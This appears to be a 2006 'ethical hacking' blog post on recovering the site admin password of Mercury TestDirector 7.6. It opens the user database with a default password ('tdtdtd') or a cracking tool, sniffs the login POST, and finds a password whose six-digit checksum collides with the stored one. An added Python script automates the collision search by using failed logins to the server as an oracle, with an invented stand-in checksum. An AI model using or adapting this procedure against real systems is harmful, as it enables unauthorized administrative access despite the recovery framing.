Ethical Hacks: How to find the site admin password for Mercury Interactive's TestDirector v7.6
Thursday, 17 August 2006 23:31
IMPORTANT NOTE: The information presented here is to be used only for legitimate cases of access loss. Using these instructions to gain access to a system without permission is a violation of both state and Federal law.

At one of my old jobs as a security engineer, I was asked to find the admin password for an application (it seems the company had managed to lay off everyone who actually knew it). This is an example of an "ethical hack", where techniques used by malicious people have legitimate application in the real world.

TestDirector 7.6 stores all its usernames, passwords, groups, and other metadata in MS Access databases. The standard database for the users is usually something like "Testdir.mdb" somewhere in the directory tree of the application suite. The admin password, however, is usually stored in a database called "doms.mdb", which you should find in "c:\program files\common files\mercury interactive\Domsinfo".

Load doms.mdb in MS Access. You'll be prompted for a password. Try "tdtdtd"; if that doesn't work, all you need is a tool for cracking MS Office passwords. Passware works great, though it's not free.

Once you have the database open, look in the ADMIN table. You'll see a field called "ADMIN_PSWD" and at least one record with a value for that field. The value will be a six-digit number like "459999". That's the checksum of the password that's been set. Yes, this is a crummy scheme: a six-digit checksum means a huge number of different passwords collide with the real one, and any one of them will get you in. Lucky for us!

Next, set up Ethereal (since renamed Wireshark) or some other sniffer on your local PC. Configure it to capture only traffic to/from the IP of your TestDirector server. Go to the site admin web page on your TestDirector server (usually something like http://server/tdbin/SiteAdmin.htm) and try logging in. Once you get an unauthorized login message, go to your sniffer and check the results. You should see some HTTP traffic back and forth between your client and the server.

You're looking for the HTTP POST from your PC to the server that includes the string "password : ". The POST will be to "/tdbin/wdomsrv.dll/TDAPI_GeneralWebTreatment". Immediately after "password : " you should see a six-digit number. That is the checksum of the password you just tried. So now you know what value the server is expecting and what value your password generates, and the only remaining problem is finding a password whose checksum matches. A bit of trial and error should get you there: every login attempt shows you one more checksum, and you steer the candidate toward the target value. For example, I found that incrementing or decrementing the first character in the password (i.e. a to b, or c to b) would increment/decrement the checksum value by 4. I didn't bother to do a lengthy analysis and determine the exact checksum method, but it's pretty simple, not utilizing any time elements. It does seem to vary depending on total password length.

Of course, this will be much more difficult if your access to the server is via https instead of http, since you can no longer read the POST body off the wire.

Originally Written June 29th, 2005 - Cleaned Up August 17th, 2006
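Here is an added example (my own code, not part of the original article and not Mercury's) that automates the trial-and-error step above. It does two things: pulls the six-digit value out of a captured POST body, and finds a colliding password against a black-box checksum "oracle". In practice the oracle is "type the candidate into SiteAdmin.htm and read the number after password : in the sniffer" (a Wireshark display filter such as ip.addr == <server> && http.request.method == "POST" narrows the capture), so each oracle call is one failed login against the real server. The search therefore spends only one probe per password position to measure how much each character moves the checksum (the article observed 4 for the first character), solves for a match offline, and spends one final call to confirm. Everything below the sample POST is an assumption: SAMPLE_POST is constructed, and toy_checksum is an invented stand-in that merely reproduces the two properties the article reports (first-character step of 4, dependence on length); it is not the real TestDirector algorithm, which the article never determined.

```python
import re
from string import ascii_lowercase
from typing import Callable, List, Optional, Tuple

# Constructed sample of the POST the sniffer shows (invented bytes, not a
# real capture); only the "password : NNNNNN" field matters here.
SAMPLE_POST = (
    "POST /tdbin/wdomsrv.dll/TDAPI_GeneralWebTreatment HTTP/1.1\r\n"
    "Host: tdserver\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "user : admin\r\n"
    "password : 459987\r\n"
)


def extract_checksum(post: str) -> Optional[int]:
    """Pull the six-digit value that follows 'password : ' out of a POST."""
    m = re.search(r"password\s*:\s*(\d{6})\b", post)
    return int(m.group(1)) if m else None


def toy_checksum(pw: str) -> int:
    """HYPOTHETICAL stand-in for the server's checksum, NOT the real
    TestDirector algorithm. It only reproduces what the article reports:
    one step in the first character moves the value by 4, and the value
    depends on the password length."""
    return 400000 + 1000 * len(pw) + sum(4 * (i + 1) * ord(c) for i, c in enumerate(pw))


def probe_weights(oracle: Callable[[str], int], length: int, alphabet: str) -> Tuple[str, int, List[int]]:
    """Measure how far the checksum moves when each position is bumped by
    one alphabet step. Costs length + 1 oracle calls (login attempts)."""
    base_pw = alphabet[0] * length
    base = oracle(base_pw)
    weights = []
    for i in range(length):
        bumped = base_pw[:i] + alphabet[1] + base_pw[i + 1:]
        weights.append(oracle(bumped) - base)
    return base_pw, base, weights


def solve(weights: List[int], need: int, n_symbols: int) -> Optional[List[int]]:
    """Find per-position alphabet indexes k_i in [0, n_symbols) such that
    sum(w_i * k_i) == need. Depth-first search with bound pruning; this is
    pure offline work, no oracle calls are spent here."""
    L = len(weights)
    lo = [0] * (L + 1)  # lo[i]/hi[i]: min/max sum reachable from position i on
    hi = [0] * (L + 1)
    for i in range(L - 1, -1, -1):
        span = weights[i] * (n_symbols - 1)
        lo[i] = lo[i + 1] + min(0, span)
        hi[i] = hi[i + 1] + max(0, span)
    ks = [0] * L

    def dfs(i: int, remaining: int) -> bool:
        if i == L:
            return remaining == 0
        if not lo[i] <= remaining <= hi[i]:
            return False  # target cannot be reached from here, prune
        for k in range(n_symbols):
            ks[i] = k
            if dfs(i + 1, remaining - weights[i] * k):
                return True
        return False

    return list(ks) if dfs(0, need) else None


def find_collision(oracle: Callable[[str], int], target: int,
                   length: int = 6, alphabet: str = ascii_lowercase) -> Tuple[Optional[str], int]:
    """Return (password, oracle_calls). The password checksums to target
    under the oracle, or None if the linear model did not hold."""
    calls = 0

    def counted(pw: str) -> int:
        nonlocal calls
        calls += 1
        return oracle(pw)

    base_pw, base, weights = probe_weights(counted, length, alphabet)
    ks = solve(weights, target - base, len(alphabet))
    if ks is None:
        return None, calls
    candidate = "".join(alphabet[k] for k in ks)
    # One last login attempt confirms the model held; a real checksum might
    # wrap at six digits or contain terms the probes did not reveal.
    if counted(candidate) != target:
        return None, calls
    return candidate, calls


if __name__ == "__main__":
    target = toy_checksum("secret")  # stands in for the ADMIN_PSWD value
    print("sniffed checksum:", extract_checksum(SAMPLE_POST))
    print("collision, login attempts used:", find_collision(toy_checksum, target))
```

Against the toy oracle the search needs eight login attempts for a six-character password (one baseline, six probes, one confirmation) and returns a password that is not "secret" but produces the same six-digit value, which is exactly the collision the article exploits. If the final confirmation fails, the real function is not linear in the character codes over the range you probed, and you fall back to stepping characters by hand as the article describes.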



